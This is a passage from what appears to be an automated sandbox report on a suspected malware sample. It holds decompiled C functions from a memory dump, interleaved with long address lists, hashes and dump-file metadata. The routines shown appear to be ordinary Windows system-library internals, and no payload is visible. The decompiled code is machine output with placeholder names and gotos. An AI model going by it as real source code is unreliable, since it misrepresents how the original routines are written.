								_t41 = _t41 - 1;
								_v8 = _t41;
							} while (_t41 != 0);
							_t37 = _v12;
						}
						L8:
						_t37 = _t37 + 1;
						_t48 = 0x2a;
						_v12 = _t37;
					} while (_t37 < _t48);
					_t40 = _a8;
					if(_a12 == 1 &&  *_t40 < _t54) {
						_t58 = 0xc0000001;
					}
					goto L11;
				}
			}























                                                                                                                              0x1d739fdb
                                                                                                                              0x1d739fe0
                                                                                                                              0x1d79bd61
                                                                                                                              0x1d79bd61
                                                                                                                              0x1d73a071
                                                                                                                              0x1d73a073
                                                                                                                              0x1d73a077
                                                                                                                              0x1d73a077
                                                                                                                              0x1d73a07d
                                                                                                                              0x1d73a082
                                                                                                                              0x1d73a082
                                                                                                                              0x1d739fe6
                                                                                                                              0x1d739feb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d739ff3
                                                                                                                              0x1d739ff6
                                                                                                                              0x1d739ff7
                                                                                                                              0x1d73a000
                                                                                                                              0x1d79bcd4
                                                                                                                              0x00000000
                                                                                                                              0x1d79bcd4
                                                                                                                              0x1d73a017
                                                                                                                              0x1d73a01b
                                                                                                                              0x1d79bcde
                                                                                                                              0x00000000
                                                                                                                              0x1d73a021
                                                                                                                              0x1d73a023
                                                                                                                              0x1d73a025
                                                                                                                              0x1d73a037
                                                                                                                              0x1d73a085
                                                                                                                              0x1d73a085
                                                                                                                              0x1d73a039
                                                                                                                              0x1d73a03b
                                                                                                                              0x1d73a03d
                                                                                                                              0x1d73a040
                                                                                                                              0x1d73a045
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d73a047
                                                                                                                              0x1d73a04a
                                                                                                                              0x1d73a051
                                                                                                                              0x1d79bced
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79bcf3
                                                                                                                              0x1d79bcf6
                                                                                                                              0x1d79bcf6
                                                                                                                              0x1d79bcf9
                                                                                                                              0x1d79bcfc
                                                                                                                              0x1d79bcff
                                                                                                                              0x1d79bd02
                                                                                                                              0x1d79bd04
                                                                                                                              0x1d79bd0b
                                                                                                                              0x1d79bd0d
                                                                                                                              0x1d79bd14
                                                                                                                              0x1d79bd25
                                                                                                                              0x1d79bd16
                                                                                                                              0x1d79bd19
                                                                                                                              0x1d79bd1c
                                                                                                                              0x1d79bd1e
                                                                                                                              0x1d79bd1e
                                                                                                                              0x1d79bd1c
                                                                                                                              0x1d79bd14
                                                                                                                              0x1d79bd28
                                                                                                                              0x1d79bd2e
                                                                                                                              0x1d79bd30
                                                                                                                              0x1d79bd38
                                                                                                                              0x1d79bd49
                                                                                                                              0x1d79bd3a
                                                                                                                              0x1d79bd3d
                                                                                                                              0x1d79bd40
                                                                                                                              0x1d79bd42
                                                                                                                              0x1d79bd42
                                                                                                                              0x1d79bd40
                                                                                                                              0x1d79bd38
                                                                                                                              0x1d79bd4c
                                                                                                                              0x1d79bd4c
                                                                                                                              0x1d79bd4e
                                                                                                                              0x1d79bd51
                                                                                                                              0x1d79bd54
                                                                                                                              0x1d79bd54
                                                                                                                              0x1d79bd59
                                                                                                                              0x1d79bd59
                                                                                                                              0x1d73a057
                                                                                                                              0x1d73a059
                                                                                                                              0x1d73a05a
                                                                                                                              0x1d73a05b
                                                                                                                              0x1d73a05e
                                                                                                                              0x1d73a067
                                                                                                                              0x1d73a06a
                                                                                                                              0x1d73a08c
                                                                                                                              0x1d73a08c
                                                                                                                              0x00000000
                                                                                                                              0x1d73a06a

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
                                                                                                                              • Instruction ID: 232f67bc9a8eceb93482c2bd445ad29ec7fa9e924e725a2d6d991cd1e935b30a
                                                                                                                              • Opcode Fuzzy Hash: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
                                                                                                                              • Instruction Fuzzy Hash: 55416732E00255FBCB09EE149489BBB7371EB41771FD2806BD9449B281E632DE40C353
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7CF85C Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 88%
                                                                                                                              			E1D7CF85C(void* __ecx, void* __edx, signed short _a4, signed int* _a8, intOrPtr* _a12, intOrPtr* _a16, char* _a20) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr* _t40;
				signed int* _t41;
				char* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t49;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				signed int _t65;
				void* _t67;
				void* _t68;

				_t65 = _a4 & 0x0000ffff;
				_v12 = __edx;
				_t63 = __ecx;
				_t47 = E1D755D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t65);
				_t30 = 0;
				_v8 = 0;
				if(_t47 == 0) {
					_t64 = 0xc0000017;
					L8:
					if(_t47 != 0) {
						E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t30, _t47);
					}
					return _t64;
				}
				_push( &_v16);
				_push(_t65);
				_push(_t47);
				_push(2);
				_push(_t63);
				_push(0xffffffff);
				_t64 = E1D782BE0();
				if(_t64 < 0) {
					L7:
					_t30 = 0;
					goto L8;
				}
				_t49 =  *((intOrPtr*)(_t47 + 4));
				_t61 = _t49 + 2;
				do {
					_t36 =  *_t49;
					_t49 = _t49 + 2;
				} while (_t36 != _v8);
				_t52 = 2 + (_t49 - _t61 >> 1) * 2;
				_v16 = _t52;
				if(_t52 >= _t65) {
					_t64 = 0x80000005;
					goto L7;
				}
				E1D7888C0(_v12,  *((intOrPtr*)(_t47 + 4)), _t52);
				_t67 = E1D78A910(_v12, 0x5c);
				if(_t67 != 0) {
					_t68 = _t67 + 2;
					_t53 = _t68;
					_t15 = _t53 + 2; // 0x0
					_t62 = _t15;
					do {
						_t39 =  *_t53;
						_t53 = _t53 + 2;
					} while (_t39 != _v8);
					_t56 = (_t53 - _t62 >> 1) + (_t53 - _t62 >> 1);
					_v8 = _t56;
					if(_a12 == 0) {
						L17:
						_t40 = _a16;
						if(_t40 != 0) {
							 *_t40 = _t56;
						}
						_t41 = _a8;
						if(_t41 != 0) {
							 *_t41 = _t68 - _v12 & 0xfffffffe;
						}
						_t42 = _a20;
						if(_t42 != 0) {
							 *_t42 = 1;
						}
						goto L7;
					}
					_t19 = _t56 + 2; // -2
					_t45 = E1D755D90(_t56,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
					 *_a12 = _t45;
					if(_t45 != 0) {
						E1D7888C0(_t45, _t68, _v8 + 2);
						_t56 = _v8;
						goto L17;
					}
					_t64 = 0xc0000017;
					goto L7;
				}
				_t64 = 0xc0000039;
				goto L7;
			}

























                                                                                                                              0x1d7cf86c
                                                                                                                              0x1d7cf877
                                                                                                                              0x1d7cf87a
                                                                                                                              0x1d7cf881
                                                                                                                              0x1d7cf883
                                                                                                                              0x1d7cf885
                                                                                                                              0x1d7cf88a
                                                                                                                              0x1d7cf9a0
                                                                                                                              0x1d7cf8f3
                                                                                                                              0x1d7cf8f5
                                                                                                                              0x1d7cf902
                                                                                                                              0x1d7cf902
                                                                                                                              0x1d7cf90d
                                                                                                                              0x1d7cf90d
                                                                                                                              0x1d7cf893
                                                                                                                              0x1d7cf894
                                                                                                                              0x1d7cf895
                                                                                                                              0x1d7cf896
                                                                                                                              0x1d7cf898
                                                                                                                              0x1d7cf899
                                                                                                                              0x1d7cf8a0
                                                                                                                              0x1d7cf8a4
                                                                                                                              0x1d7cf8f1
                                                                                                                              0x1d7cf8f1
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf8f1
                                                                                                                              0x1d7cf8a6
                                                                                                                              0x1d7cf8a9
                                                                                                                              0x1d7cf8ac
                                                                                                                              0x1d7cf8ac
                                                                                                                              0x1d7cf8af
                                                                                                                              0x1d7cf8b2
                                                                                                                              0x1d7cf8bc
                                                                                                                              0x1d7cf8c3
                                                                                                                              0x1d7cf8c8
                                                                                                                              0x1d7cf996
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf996
                                                                                                                              0x1d7cf8d6
                                                                                                                              0x1d7cf8e3
                                                                                                                              0x1d7cf8ea
                                                                                                                              0x1d7cf910
                                                                                                                              0x1d7cf913
                                                                                                                              0x1d7cf915
                                                                                                                              0x1d7cf915
                                                                                                                              0x1d7cf918
                                                                                                                              0x1d7cf918
                                                                                                                              0x1d7cf91b
                                                                                                                              0x1d7cf91e
                                                                                                                              0x1d7cf928
                                                                                                                              0x1d7cf92e
                                                                                                                              0x1d7cf931
                                                                                                                              0x1d7cf96b
                                                                                                                              0x1d7cf96b
                                                                                                                              0x1d7cf970
                                                                                                                              0x1d7cf972
                                                                                                                              0x1d7cf972
                                                                                                                              0x1d7cf974
                                                                                                                              0x1d7cf979
                                                                                                                              0x1d7cf981
                                                                                                                              0x1d7cf981
                                                                                                                              0x1d7cf983
                                                                                                                              0x1d7cf988
                                                                                                                              0x1d7cf98e
                                                                                                                              0x1d7cf98e
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf988
                                                                                                                              0x1d7cf933
                                                                                                                              0x1d7cf942
                                                                                                                              0x1d7cf94a
                                                                                                                              0x1d7cf94e
                                                                                                                              0x1d7cf960
                                                                                                                              0x1d7cf965
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf968
                                                                                                                              0x1d7cf950
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf950
                                                                                                                              0x1d7cf8ec
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cb0bcaa3f36bd7800b6d3b1f9a2176e5bbd4437140be60675105ed45ac0ae463
                                                                                                                              • Instruction ID: 0be4c934ecb0622663934233dfc38d7255bc337ed5f251c692adcaab66566e18
                                                                                                                              • Opcode Fuzzy Hash: cb0bcaa3f36bd7800b6d3b1f9a2176e5bbd4437140be60675105ed45ac0ae463
                                                                                                                              • Instruction Fuzzy Hash: DD41F237A01656EFCB15CF68CC54BABB7B8EF44720F164069E9059B290D734EE01C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77F523 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E1D77F523(signed int* __ecx, signed int* __edx, char _a4, char _a8, char _a12, char _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char* _v92;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				intOrPtr _v136;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t50;
				intOrPtr _t53;
				signed int* _t82;
				signed int _t83;

				_t78 = __edx;
				_v8 =  *0x1d83b370 ^ _t83;
				_t46 =  *[fs:0x30];
				_t82 = __edx;
				_t81 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
					L7:
					return E1D784B50(_t46, 0, _v8 ^ _t83, _t78, _t81, _t82);
				}
				_t46 = E1D740FB0(__ecx, __edx, 0x1d8368c0, 0x1d7826a0, 0, 0);
				if(__ecx != 0 && _t82 != 0) {
					_t46 =  *__ecx | __ecx[1];
					if(( *__ecx | __ecx[1]) == 0) {
						goto L7;
					}
					_t46 =  *_t82 | _t82[1];
					if(( *_t82 | _t82[1]) == 0) {
						goto L7;
					}
					_t50 =  *0x1d8368b8; // 0x0
					_t46 = _t50 |  *0x1d8368bc;
					if(_t46 == 0) {
						goto L7;
					}
					asm("lock xadd [0x1d8338f8], ax");
					if(_t46 == 0) {
						if( *0x1d833430 > 5 && E1D73DE1A(0x1d833430, 0, 0x2000) != 0) {
							_t76 =  *_t82 -  *__ecx;
							asm("sbb eax, [edi+0x4]");
							_v140 = E1D786310(E1D7864A0( *_t82 -  *__ecx, _t82[1], 0xf4240, 0), _t78,  *0x1d8368b8,  *0x1d8368bc);
							_v92 =  &_v140;
							_v125 = _a4;
							_v76 =  &_v125;
							_v126 = _a8;
							_v60 =  &_v126;
							_v127 = _a12;
							_v44 =  &_v127;
							_v128 = _a16;
							_v28 =  &_v128;
							_v136 = _t78;
							_v88 = 0;
							_v68 = 1;
							_v52 = 1;
							_v36 = 1;
							_v20 = 1;
							_t78 = 0x1d720e03;
							_v84 = 8;
							_v80 = 0;
							_v72 = 0;
							_v64 = 0;
							_v56 = 0;
							_v48 = 0;
							_v40 = 0;
							_v32 = 0;
							_v24 = 0;
							_v16 = 0;
							E1D7C105C(0x1d833430, 0x1d720e03, _t76, _t76, 7,  &_v124);
						}
						_t53 = 0x64;
						_t46 =  *0x1d8338f8;
						 *0x1d8338f8 = _t53;
					}
				}
			}






































                                                                                                                              0x1d77f523
                                                                                                                              0x1d77f535
                                                                                                                              0x1d77f538
                                                                                                                              0x1d77f542
                                                                                                                              0x1d77f545
                                                                                                                              0x1d77f54a
                                                                                                                              0x1d77f597
                                                                                                                              0x1d77f5a5
                                                                                                                              0x1d77f5a5
                                                                                                                              0x1d77f558
                                                                                                                              0x1d77f55f
                                                                                                                              0x1d77f567
                                                                                                                              0x1d77f56a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d77f56e
                                                                                                                              0x1d77f571
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d77f573
                                                                                                                              0x1d77f578
                                                                                                                              0x1d77f57e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d77f584
                                                                                                                              0x1d77f595
                                                                                                                              0x1d77f5af
                                                                                                                              0x1d7ad705
                                                                                                                              0x1d7ad70a
                                                                                                                              0x1d7ad72d
                                                                                                                              0x1d7ad739
                                                                                                                              0x1d7ad73f
                                                                                                                              0x1d7ad745
                                                                                                                              0x1d7ad74b
                                                                                                                              0x1d7ad751
                                                                                                                              0x1d7ad757
                                                                                                                              0x1d7ad75d
                                                                                                                              0x1d7ad763
                                                                                                                              0x1d7ad769
                                                                                                                              0x1d7ad770
                                                                                                                              0x1d7ad779
                                                                                                                              0x1d7ad77f
                                                                                                                              0x1d7ad782
                                                                                                                              0x1d7ad785
                                                                                                                              0x1d7ad788
                                                                                                                              0x1d7ad78b
                                                                                                                              0x1d7ad796
                                                                                                                              0x1d7ad79d
                                                                                                                              0x1d7ad7a0
                                                                                                                              0x1d7ad7a3
                                                                                                                              0x1d7ad7a6
                                                                                                                              0x1d7ad7a9
                                                                                                                              0x1d7ad7ac
                                                                                                                              0x1d7ad7af
                                                                                                                              0x1d7ad7b2
                                                                                                                              0x1d7ad7b5
                                                                                                                              0x1d7ad7b8
                                                                                                                              0x1d7ad7b8
                                                                                                                              0x1d77f5cb
                                                                                                                              0x1d77f5d1
                                                                                                                              0x1d77f5d1
                                                                                                                              0x1d77f5d1
                                                                                                                              0x1d77f595

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b434b9b343fc61d6e4968eba57a4c696afc847565de0febfa9ab571904624797
                                                                                                                              • Instruction ID: d1f58264e0b25497e8168638b8d8739981f00328a0cac3b837ae1d27a3f67c8b
                                                                                                                              • Opcode Fuzzy Hash: b434b9b343fc61d6e4968eba57a4c696afc847565de0febfa9ab571904624797
                                                                                                                              • Instruction Fuzzy Hash: 6E416BB5D04248EFDB14CFA9D981AADFBF4BF48354F50892EE499A7202D730A904CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D80D7A7 Relevance: .1, Instructions: 120COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D80D7A7(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				void* __ebx;
				unsigned int _t36;
				intOrPtr _t39;
				signed int _t45;
				char* _t46;
				signed int _t47;
				char* _t48;
				intOrPtr _t55;
				signed int _t61;
				void* _t66;
				signed int _t67;
				signed int _t68;
				void* _t82;
				signed int _t91;
				signed int* _t94;

				_t82 = __edx;
				_v20 = _v20 & 0x00000000;
				_t3 = _t82 + 1; // 0x1
				_v16 = _t3;
				_t94 = __ecx;
				_t91 = E1D80BFDB(__ecx, _t3, __eflags, _a4);
				if(_t91 != 0) {
					_t36 =  !( *_t94) + 1;
					__eflags = _t36 - 0x100000;
					_v24 = _t36;
					_t73 = (_t36 != 0x100000) + 1;
					_t66 = (_t91 -  *0x1d836dc4 >> 0x14) + (_t91 -  *0x1d836dc4 >> 0x14);
					_v8 = (_t36 != 0x100000) + 1;
					_t39 = (_t36 >> 0x14) + (_t36 >> 0x14) + _t66;
					_v12 = _t39;
					__eflags = _t66 - _t39;
					if(_t66 >= _t39) {
						L5:
						_v20 = 1;
						asm("lock xadd [eax], ecx");
						_t67 = _v16;
						asm("lock xadd [eax], ecx");
						_t45 = E1D753C40();
						__eflags = _t45;
						if(_t45 == 0) {
							_t46 = 0x7ffe0380;
						} else {
							_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						__eflags =  *_t46;
						if( *_t46 != 0) {
							_t55 =  *[fs:0x30];
							__eflags =  *(_t55 + 0x240) & 0x00000001;
							if(( *(_t55 + 0x240) & 0x00000001) != 0) {
								__eflags = _t67 << 0xc;
								E1D7FEFD3(_t67, _t94[9], _t91, _t67 << 0xc, 0xc);
							}
						}
						_t47 = E1D753C40();
						__eflags = _t47;
						if(_t47 == 0) {
							_t48 = 0x7ffe0388;
						} else {
							_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
						}
						__eflags =  *_t48;
						if( *_t48 != 0) {
							E1D7FDAAF(_t67, _t94[9], _t91, _v24);
						}
						__eflags =  *0x1d836938 & 0x00000008;
						if(( *0x1d836938 & 0x00000008) != 0) {
							__eflags = _t94 + _t94[4];
							E1D800BAD(_t94[9], _t94 + _t94[4]);
						}
						_t68 = _t91;
						_t91 = 0;
						__eflags = 0;
						L20:
						__eflags = _t91;
						if(_t91 != 0) {
							E1D80D946(_t94, _t91, _v16, _v20);
						}
						goto L22;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t61 = E1D80DF19(0x1d836dc8, _t66, _t73, _t73);
						__eflags = _t61;
						if(_t61 < 0) {
							break;
						}
						_t73 = _v8;
						_t66 = _t66 + 2;
						__eflags = _t66 - _v12;
						if(_t66 < _v12) {
							continue;
						}
						goto L5;
					}
					_t68 = 0;
					goto L20;
				} else {
					_t68 = 0;
					L22:
					return _t68;
				}
			}























                                                                                                                              0x1d80d7a7
                                                                                                                              0x1d80d7b2
                                                                                                                              0x1d80d7b7
                                                                                                                              0x1d80d7c2
                                                                                                                              0x1d80d7c6
                                                                                                                              0x1d80d7cd
                                                                                                                              0x1d80d7d1
                                                                                                                              0x1d80d7e2
                                                                                                                              0x1d80d7e3
                                                                                                                              0x1d80d7e8
                                                                                                                              0x1d80d7f8
                                                                                                                              0x1d80d7fe
                                                                                                                              0x1d80d800
                                                                                                                              0x1d80d804
                                                                                                                              0x1d80d806
                                                                                                                              0x1d80d80a
                                                                                                                              0x1d80d80c
                                                                                                                              0x1d80d82d
                                                                                                                              0x1d80d835
                                                                                                                              0x1d80d842
                                                                                                                              0x1d80d84a
                                                                                                                              0x1d80d855
                                                                                                                              0x1d80d859
                                                                                                                              0x1d80d85e
                                                                                                                              0x1d80d860
                                                                                                                              0x1d80d876
                                                                                                                              0x1d80d862
                                                                                                                              0x1d80d86b
                                                                                                                              0x1d80d86b
                                                                                                                              0x1d80d87b
                                                                                                                              0x1d80d87e
                                                                                                                              0x1d80d880
                                                                                                                              0x1d80d886
                                                                                                                              0x1d80d88d
                                                                                                                              0x1d80d896
                                                                                                                              0x1d80d89c
                                                                                                                              0x1d80d89c
                                                                                                                              0x1d80d88d
                                                                                                                              0x1d80d8a1
                                                                                                                              0x1d80d8a6
                                                                                                                              0x1d80d8a8
                                                                                                                              0x1d80d8ba
                                                                                                                              0x1d80d8aa
                                                                                                                              0x1d80d8b3
                                                                                                                              0x1d80d8b3
                                                                                                                              0x1d80d8bf
                                                                                                                              0x1d80d8c2
                                                                                                                              0x1d80d8cd
                                                                                                                              0x1d80d8cd
                                                                                                                              0x1d80d8d2
                                                                                                                              0x1d80d8d9
                                                                                                                              0x1d80d8e2
                                                                                                                              0x1d80d8e4
                                                                                                                              0x1d80d8e4
                                                                                                                              0x1d80d8e9
                                                                                                                              0x1d80d8eb
                                                                                                                              0x1d80d8eb
                                                                                                                              0x1d80d8ed
                                                                                                                              0x1d80d8ed
                                                                                                                              0x1d80d8ef
                                                                                                                              0x1d80d8fd
                                                                                                                              0x1d80d8fd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80d80e
                                                                                                                              0x1d80d80e
                                                                                                                              0x1d80d817
                                                                                                                              0x1d80d81c
                                                                                                                              0x1d80d81e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80d820
                                                                                                                              0x1d80d824
                                                                                                                              0x1d80d827
                                                                                                                              0x1d80d82b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80d82b
                                                                                                                              0x1d80d872
                                                                                                                              0x00000000
                                                                                                                              0x1d80d7d3
                                                                                                                              0x1d80d7d3
                                                                                                                              0x1d80d902
                                                                                                                              0x1d80d90a
                                                                                                                              0x1d80d90a

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: acb3b0ff43d694c4c070fc67d28dd590300039516995d503436e74805dc650f4
                                                                                                                              • Instruction ID: 2abfdcb97b9700a317eec1ca7ba99d9d46bf698415c0e13ac5e75b989c7c2e39
                                                                                                                              • Opcode Fuzzy Hash: acb3b0ff43d694c4c070fc67d28dd590300039516995d503436e74805dc650f4
                                                                                                                              • Instruction Fuzzy Hash: 8C41DF756083018FD315CF2DCC84B2ABBE6EBC4750F09492DE99687B91DA74E845CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D80BA66 Relevance: .1, Instructions: 115COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 53%
                                                                                                                              			E1D80BA66(signed int* __ecx, intOrPtr __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				void* _t68;
				signed int* _t80;
				signed int _t83;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t80 = __ecx;
				_t83 = E1D80B9DD(__ecx, __edx);
				_v12 = _t83;
				if(_t83 != 0) {
					_t29 =  *__ecx & _t83;
					_t74 = (_t83 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t83 - _t29 >> 4 << __ecx[1]) + _t29) {
						E1D80D297(__ecx, _t83, 0, _a4);
						_t83 = 1;
						if(E1D753C40() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E1D7FF247( *((intOrPtr*)(_t80 + 0x24)), _t56);
						}
						goto L22;
					}
					if(( *(_t83 + 0xc) & 0x0000000c) != 8) {
						_t83 = E1D80F5C9(__ecx[6], _t74, __edx, _a4,  &_v8);
						if(_t83 != 0) {
							_t66 =  *((intOrPtr*)(_t80 + 0x14));
							_t77 = _v8;
							if(_v8 <= ( *( *((intOrPtr*)(_t80 + 0x14)) + 0x20) & 0x0000ffff) - 8) {
								E1D806554(_t66, _t77, 0);
							}
						}
					} else {
						_t83 = E1D8075C6(__ecx[5], _t74, __edx, _a4);
					}
					if(E1D753C40() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t83 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(_t83);
					_push(_t83);
					_push(_t83);
					_push(__edx);
					_t68 = 9;
					E1D805FED(_t68, __ecx[9]);
					L22:
					return _t83;
				}
			}











                                                                                                                              0x1d80ba6b
                                                                                                                              0x1d80ba6c
                                                                                                                              0x1d80ba70
                                                                                                                              0x1d80ba72
                                                                                                                              0x1d80ba79
                                                                                                                              0x1d80ba7b
                                                                                                                              0x1d80ba80
                                                                                                                              0x1d80ba9d
                                                                                                                              0x1d80baa6
                                                                                                                              0x1d80baaa
                                                                                                                              0x1d80bb4b
                                                                                                                              0x1d80bb52
                                                                                                                              0x1d80bb5a
                                                                                                                              0x1d80bb6c
                                                                                                                              0x1d80bb5c
                                                                                                                              0x1d80bb65
                                                                                                                              0x1d80bb65
                                                                                                                              0x1d80bb74
                                                                                                                              0x1d80bb85
                                                                                                                              0x1d80bb87
                                                                                                                              0x1d80bb8c
                                                                                                                              0x1d80bb8c
                                                                                                                              0x00000000
                                                                                                                              0x1d80bb74
                                                                                                                              0x1d80bab7
                                                                                                                              0x1d80bad9
                                                                                                                              0x1d80badd
                                                                                                                              0x1d80badf
                                                                                                                              0x1d80bae2
                                                                                                                              0x1d80baee
                                                                                                                              0x1d80baf2
                                                                                                                              0x1d80baf2
                                                                                                                              0x1d80baee
                                                                                                                              0x1d80bab9
                                                                                                                              0x1d80bac5
                                                                                                                              0x1d80bac5
                                                                                                                              0x1d80bafe
                                                                                                                              0x1d80bb10
                                                                                                                              0x1d80bb00
                                                                                                                              0x1d80bb09
                                                                                                                              0x1d80bb09
                                                                                                                              0x1d80bb18
                                                                                                                              0x00000000
                                                                                                                              0x1d80bb2d
                                                                                                                              0x1d80bb3f
                                                                                                                              0x00000000
                                                                                                                              0x1d80bb3f
                                                                                                                              0x1d80ba82
                                                                                                                              0x1d80ba85
                                                                                                                              0x1d80ba86
                                                                                                                              0x1d80ba87
                                                                                                                              0x1d80ba88
                                                                                                                              0x1d80ba8b
                                                                                                                              0x1d80ba8c
                                                                                                                              0x1d80bb91
                                                                                                                              0x1d80bb97
                                                                                                                              0x1d80bb97

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
